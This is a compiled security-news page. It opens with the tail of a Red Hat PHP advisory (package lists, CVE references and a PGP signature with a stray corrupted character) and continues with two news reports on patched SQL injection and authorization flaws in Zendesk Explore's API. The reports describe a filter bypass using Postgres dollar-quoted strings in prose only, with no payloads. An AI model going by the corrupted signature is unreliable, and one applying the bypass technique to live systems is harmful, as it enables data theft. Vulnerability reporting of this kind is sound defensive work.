php-pgsql-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-process-8.0.20-3.el9.aarch64.rpm  
php-process-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-snmp-8.0.20-3.el9.aarch64.rpm  
php-snmp-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-soap-8.0.20-3.el9.aarch64.rpm  
php-soap-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-xml-8.0.20-3.el9.aarch64.rpm  
php-xml-debuginfo-8.0.20-3.el9.aarch64.rpm

ppc64le:  
php-8.0.20-3.el9.ppc64le.rpm  
php-bcmath-8.0.20-3.el9.ppc64le.rpm  
php-bcmath-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-cli-8.0.20-3.el9.ppc64le.rpm  
php-cli-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-common-8.0.20-3.el9.ppc64le.rpm  
php-common-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-dba-8.0.20-3.el9.ppc64le.rpm  
php-dba-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-dbg-8.0.20-3.el9.ppc64le.rpm  
php-dbg-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-debugsource-8.0.20-3.el9.ppc64le.rpm  
php-devel-8.0.20-3.el9.ppc64le.rpm  
php-embedded-8.0.20-3.el9.ppc64le.rpm  
php-embedded-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-enchant-8.0.20-3.el9.ppc64le.rpm  
php-enchant-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-ffi-8.0.20-3.el9.ppc64le.rpm  
php-ffi-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-fpm-8.0.20-3.el9.ppc64le.rpm  
php-fpm-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-gd-8.0.20-3.el9.ppc64le.rpm  
php-gd-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-gmp-8.0.20-3.el9.ppc64le.rpm  
php-gmp-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-intl-8.0.20-3.el9.ppc64le.rpm  
php-intl-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-ldap-8.0.20-3.el9.ppc64le.rpm  
php-ldap-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-mbstring-8.0.20-3.el9.ppc64le.rpm  
php-mbstring-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-mysqlnd-8.0.20-3.el9.ppc64le.rpm  
php-mysqlnd-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-odbc-8.0.20-3.el9.ppc64le.rpm  
php-odbc-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-opcache-8.0.20-3.el9.ppc64le.rpm  
php-opcache-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-pdo-8.0.20-3.el9.ppc64le.rpm  
php-pdo-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-pgsql-8.0.20-3.el9.ppc64le.rpm  
php-pgsql-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-process-8.0.20-3.el9.ppc64le.rpm  
php-process-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-snmp-8.0.20-3.el9.ppc64le.rpm  
php-snmp-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-soap-8.0.20-3.el9.ppc64le.rpm  
php-soap-debuginfo-8.0.20-3.el9.ppc64le.rpm  
php-xml-8.0.20-3.el9.ppc64le.rpm  
php-xml-debuginfo-8.0.20-3.el9.ppc64le.rpm

s390x:  
php-8.0.20-3.el9.s390x.rpm  
php-bcmath-8.0.20-3.el9.s390x.rpm  
php-bcmath-debuginfo-8.0.20-3.el9.s390x.rpm  
php-cli-8.0.20-3.el9.s390x.rpm  
php-cli-debuginfo-8.0.20-3.el9.s390x.rpm  
php-common-8.0.20-3.el9.s390x.rpm  
php-common-debuginfo-8.0.20-3.el9.s390x.rpm  
php-dba-8.0.20-3.el9.s390x.rpm  
php-dba-debuginfo-8.0.20-3.el9.s390x.rpm  
php-dbg-8.0.20-3.el9.s390x.rpm  
php-dbg-debuginfo-8.0.20-3.el9.s390x.rpm  
php-debuginfo-8.0.20-3.el9.s390x.rpm  
php-debugsource-8.0.20-3.el9.s390x.rpm  
php-devel-8.0.20-3.el9.s390x.rpm  
php-embedded-8.0.20-3.el9.s390x.rpm  
php-embedded-debuginfo-8.0.20-3.el9.s390x.rpm  
php-enchant-8.0.20-3.el9.s390x.rpm  
php-enchant-debuginfo-8.0.20-3.el9.s390x.rpm  
php-ffi-8.0.20-3.el9.s390x.rpm  
php-ffi-debuginfo-8.0.20-3.el9.s390x.rpm  
php-fpm-8.0.20-3.el9.s390x.rpm  
php-fpm-debuginfo-8.0.20-3.el9.s390x.rpm  
php-gd-8.0.20-3.el9.s390x.rpm  
php-gd-debuginfo-8.0.20-3.el9.s390x.rpm  
php-gmp-8.0.20-3.el9.s390x.rpm  
php-gmp-debuginfo-8.0.20-3.el9.s390x.rpm  
php-intl-8.0.20-3.el9.s390x.rpm  
php-intl-debuginfo-8.0.20-3.el9.s390x.rpm  
php-ldap-8.0.20-3.el9.s390x.rpm  
php-ldap-debuginfo-8.0.20-3.el9.s390x.rpm  
php-mbstring-8.0.20-3.el9.s390x.rpm  
php-mbstring-debuginfo-8.0.20-3.el9.s390x.rpm  
php-mysqlnd-8.0.20-3.el9.s390x.rpm  
php-mysqlnd-debuginfo-8.0.20-3.el9.s390x.rpm  
php-odbc-8.0.20-3.el9.s390x.rpm  
php-odbc-debuginfo-8.0.20-3.el9.s390x.rpm  
php-opcache-8.0.20-3.el9.s390x.rpm  
php-opcache-debuginfo-8.0.20-3.el9.s390x.rpm  
php-pdo-8.0.20-3.el9.s390x.rpm  
php-pdo-debuginfo-8.0.20-3.el9.s390x.rpm  
php-pgsql-8.0.20-3.el9.s390x.rpm  
php-pgsql-debuginfo-8.0.20-3.el9.s390x.rpm  
php-process-8.0.20-3.el9.s390x.rpm  
php-process-debuginfo-8.0.20-3.el9.s390x.rpm  
php-snmp-8.0.20-3.el9.s390x.rpm  
php-snmp-debuginfo-8.0.20-3.el9.s390x.rpm  
php-soap-8.0.20-3.el9.s390x.rpm  
php-soap-debuginfo-8.0.20-3.el9.s390x.rpm  
php-xml-8.0.20-3.el9.s390x.rpm  
php-xml-debuginfo-8.0.20-3.el9.s390x.rpm

x86_64:  
php-8.0.20-3.el9.x86_64.rpm  
php-bcmath-8.0.20-3.el9.x86_64.rpm  
php-bcmath-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-cli-8.0.20-3.el9.x86_64.rpm  
php-cli-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-common-8.0.20-3.el9.x86_64.rpm  
php-common-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-dba-8.0.20-3.el9.x86_64.rpm  
php-dba-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-dbg-8.0.20-3.el9.x86_64.rpm  
php-dbg-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-debugsource-8.0.20-3.el9.x86_64.rpm  
php-devel-8.0.20-3.el9.x86_64.rpm  
php-embedded-8.0.20-3.el9.x86_64.rpm  
php-embedded-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-enchant-8.0.20-3.el9.x86_64.rpm  
php-enchant-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-ffi-8.0.20-3.el9.x86_64.rpm  
php-ffi-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-fpm-8.0.20-3.el9.x86_64.rpm  
php-fpm-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-gd-8.0.20-3.el9.x86_64.rpm  
php-gd-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-gmp-8.0.20-3.el9.x86_64.rpm  
php-gmp-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-intl-8.0.20-3.el9.x86_64.rpm  
php-intl-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-ldap-8.0.20-3.el9.x86_64.rpm  
php-ldap-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-mbstring-8.0.20-3.el9.x86_64.rpm  
php-mbstring-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-mysqlnd-8.0.20-3.el9.x86_64.rpm  
php-mysqlnd-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-odbc-8.0.20-3.el9.x86_64.rpm  
php-odbc-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-opcache-8.0.20-3.el9.x86_64.rpm  
php-opcache-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-pdo-8.0.20-3.el9.x86_64.rpm  
php-pdo-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-pgsql-8.0.20-3.el9.x86_64.rpm  
php-pgsql-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-process-8.0.20-3.el9.x86_64.rpm  
php-process-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-snmp-8.0.20-3.el9.x86_64.rpm  
php-snmp-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-soap-8.0.20-3.el9.x86_64.rpm  
php-soap-debuginfo-8.0.20-3.el9.x86_64.rpm  
php-xml-8.0.20-3.el9.x86_64.rpm  
php-xml-debuginfo-8.0.20-3.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-21708  
https://access.redhat.com/security/cve/CVE-2022-31625  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.1_release_notes/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3OMW9zjgjWX9erEAQj/kg/9GSYTpNzlEIlJZov+EWGaAKzxPB7NoVQ/  
cLTon+/fVVU0qBcxoxWA3O56UxYi8lifl62aMvFUbihLsC76QTteLAkwasjWWAyg  
Hl0/+tg6OzOaV6zmMyr/Y+RcM4+NhvQj1+ECj1sx8FXSypgOFhi7bXDM5XfjnOTh  
K+jd2LY16YBzbvf7hcOsZxqMsNANwCWIWJC8kc41ARM/FREx+cy/R3MsdmHQ+Ucn  
zr5AUORu92rUW4qgsoNcR4wzUKvhulN8ZVgix8IRh+OsDZWB/EMiKIml99pQG/Vi  
Nl/wPNOpIZHBHDOSDg0BGMJz0Z+w//mp+m9XDk0KKA3wSoH4L4tl+w6ZIunP/mr/  
CiWPnMySwdlBCIQ64D2kICErN9g63u04t8PUgQfQKiFpObiaLcYwfed1kr4dpIki  
co4nCrF6CwknSn5cDF4cp5Y3pcN/dSsd2WdLN756Ebf0osfuqh6q3Pwoc/Jfp9uG  
YAgw/kli1sjl3YiG/nfuDVJBid8kS8ylymkUSDgfii7tMHLcnLnCk7deI40qDMUa  
p28RFPjNY27uCQURvi5oUzflsDo08otNYVq0/fQhGC2UrPWglyC4ClGp2GArag06  
i3kCsjDAiyRcavAh4KcymbWsVaTDyZOeWNAEJlcko2jjFARjFtNkmoMaa98uIEmP  
PRH5jXRX0+gµpo  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8197-01

Patched SQLi and logical access vulnerabilities posed serious risk

Patched SQLi and logical access vulnerabilities posed serious risk

Security researchers from Varonis have published details of SQL injection and logical access vulnerabilities in Zendesk Explore that posed a severe threat for users of the popular customer service platform.

Zendesk acted promptly in response to vulnerability reports by creating patches that required no customer action, according to Varonis.

This is just as well because the vulnerability would have allowed potential miscreants to access conversations, tickets, comments, email addresses, and other information held in Zendesk accounts in instances where Explore was enabled.

Catch up on the latest cybersecurity research news

Potential exploitation would have involved an attacker first registering for the ticketing service as an external user of a targeted Zendesk account, a commonly enabled feature. The vulnerable Zendesk Explore facility is not enabled by default but still widely used because it powers the analytic insights page of the CRM platform.

Zendesk uses multiple GraphQL APIs in its products, especially in the administration console. Because GraphQL is a relatively new API format, this prompted security researchers from Varonis Threat Labs to explore Zendesk’s implementation, in what turned out to be a fruitful search.

**API hunting ground**

Zendesk uses multiple APIs in its products. Varonis Threat Labs found a query field called execute-query. This field stood out because it contains a Base64-encoded JSON object, inside a Base64-encoded XML document, inside a JSON object. Multiple nested encodings like this one usually mean that many different services (likely created by separate developers or even teams) are used to process this data.

“This API method accepts a JSON object with the Query XML, along with multiple other XML parameters, some of which are encoded in Base64,” the researchers explain in a technical blog post.

“One of the fields passed to the API is extra\_param3\_value which includes a plain-text XML document, DesignSchema, not encoded in Base64.”

DesignSchema defines the relationship between an AWS RDS (managed relational database) and the Query XML document.

**Old school SQL injection**

Varonis discovered that the name attributes in this XML document were vulnerable to a SQL injection attack. The security researchers found a way to exploit this vulnerability to exfiltrate data.

In response to questions from The Daily Swig, Michael Buckbee, a security engineer at Varonis, explained that although the issue is complicated on multiple levels by encoding, “at its heart” it’s a classic SQL injection problem.

“The root cause was fields that were not properly filtered in the application,” Buckbee explained.

The researcher added: “While the method that the SQL command is passed from the client back to Zendesk is complicated with multiple levels of Base64-encoded JSON and XML as part of a GraphQL action, the root cause of the SQL Injection isn’t the multiple levels of encoding, but insufficient validation happening on the application server parsing the response.”

The researchers went on to discover that the execute-query API failed to carry out several logical checks on requests.

“Most critically, the API endpoint did not verify that the caller had permission to access the database and execute queries,” Varonis reports. “This meant that a newly created end-user could invoke this API, change the query, and steal data from any table in the target Zendesk account’s RDS, no SQLi required.”

**Zen garden**

Zendesk quickly resolved the issues in Explore with Varonis Threat Labs’ help, without requiring customers to take any action.

The Daily Swig invited Zendesk to comment on the vulnerabilities, Varonis’ research, and its remediation action. We haven’t heard back, as yet, but we’ll update this story as and when more news comes to hand.

YOU MAY ALSO LIKE CSRF in Plesk API enabled server takeover

Zendesk Explore flaws opened the door to account pillage

The API-related vulnerabilities put conversations, email addresses, tickets, and more in danger of exposure via the Zendesk Explore reporting service.

Multiple security vulnerabilities in Zendesk's Web-based customer relationship management (CRM) platform could have allowed attackers to access sensitive information from potentially any customer account — a discovery that showcases application programming interface (API) endpoint weaknesses in enterprise software-as-a-solution (SaaS) applications.  

Researchers from Varonis Threat Labs discovered the issues — specifically an SQL injection vulnerability and a logical access flaw — in Zendesk Explore, a component of Zendesk's platform, they said in a blog post published Nov. 15.

More than 100,000 customers currently use Zendesk for their customer experience solution, according to the company's website. Zendesk Explore is the aspect of the suite aimed at helping those customers analyze, understand, and share data about their respective businesses.

Researchers found they could use the flaws to extract data from Zendesk Explore, including the list of tables from Zendesk’s relational database service (RDS) instance as well as all the information stored in the database. That info included email addresses of users, sales leads, deals from the CRM, live agent conversations, tickets, help center articles, and more, they said.

For successful exploitation, a potential victim would have to have Zendesk Explore enabled, and an attacker would first have to register for the ticketing service of a victim’s Zendesk account as a new external user, the researchers explained.

However, "registration is enabled by default because many Zendesk customers rely on end users submitting support tickets directly via the web," they wrote in the post. Zendesk Explore, on the other hand, is not enabled by default, but it is "heavily advertised as a requirement for the analytic insights page," the researchers noted.

Varonis worked with Zendesk to fix the flaws, which the company managed to do quickly, pushing out a patch that required no customer action "in less than one work week," the researchers said. There is no evidence that the vulnerabilities were exploited before the fix was issued, they added.

However, a look at the technical details brings up just how easy it is to introduce security flaws into cloud-based enterprise apps.

**Common Flaw, Unique Coding**

While SQL injection (SQLi) flaws are one of the most common types of vulnerabilities found in Web applications, the Zendesk issue was unique for a couple of reasons, Michael Buckbee, a security engineer at Varonis, tells Dark Reading.

"What made this particular attack novel was both how the Zendesk application was building its SQL queries — as nested objects within a larger GraphQL message — and the use of Postgres DB’s dollar-quoted string constant feature to bypass the application’s existing SQL injection filter," Buckbee says.

Zendesk uses multiple GraphQL APIs in its products, especially in the administration console, the researchers explained in the post. GraphQL is a relatively new API format, and upon investigation of its implementation in Zendesk, they found a particularly interesting object type in Zendesk Explore, named QueryTemplate, that pointed to a potential issue.

"The querySchema field stood out because it contains a Base64-encoded XML document named Query inside of a JSON object, and many of the attributes in the XML were Base64-encoded JSON objects themselves," the researchers wrote.

This represented a multiple-nested encoding, a code scenario that always catches the attention of threat researchers, "because a large number of wrappers around data usually means that many different services (which were most likely created by separate developers or even teams) are used to process this data," they said.

In short, the more code there is in an application, the more potential locations there are for vulnerabilities to lurk, the researchers said.

Researchers leveraged the admin user of their lab's own Zendesk account to explore the application further by visualizing a report in Zendesk Explore, where they found an API called execute-query that eventually led them to discover the flaws.

**Unpacking the Issues**

Some further digging led the researchers to an XML document in which all the name attributes were found to be vulnerable to a SQL injection attack, they said. Name attributes define the tables and columns to be queried in an XML document.

Further exploration of the execute-query API found that it did not perform several logical checks on request, representing another vulnerability in the application.

"The integrity of documents was not checked, allowing our team to modify them in ways that exposed the inner workings of the system," the researchers said.

Moreover, the "query,” “datasources,” and “cubeModels” IDs were not evaluated to see if they belonged to the current user. And finally, and "most critically," the API endpoint did not verify that the caller had permission to access the database and execute queries, the researchers noted

"This meant that a newly created end-user could invoke this API, change the query, and steal data from any table in the target Zendesk account’s RDS, no SQLi required," they said.

**Mitigating Risk**

With Zendesk patching the flaw quickly before it affected any customers, enterprises using the CRM solution don't need to take further action to mitigate the issue, Buckbee says. However, with SQLi issues such a common problem, Zendesk and other companies offering Web-hosted application suites should be more proactive by taking preventative steps to monitor their environments to avoid similar scenarios in the future, he says.

The situation is real: US companies face a combined $12 billion to $23 billion in losses in 2022 from compromises linked to Web APIs, which have proliferated with the increased adoption of SaaS and cloud services, and DevOps-style development methodologies, according to a recent analysis of breach data.

"Enterprise SaaS vendors should rigorously test their API endpoints for novel SQL injection attacks," Buckbee says, "such as those involving internally developed methods of generating dynamic SQL statements, to avoid exposing customers to similar risk."

Tag

#sql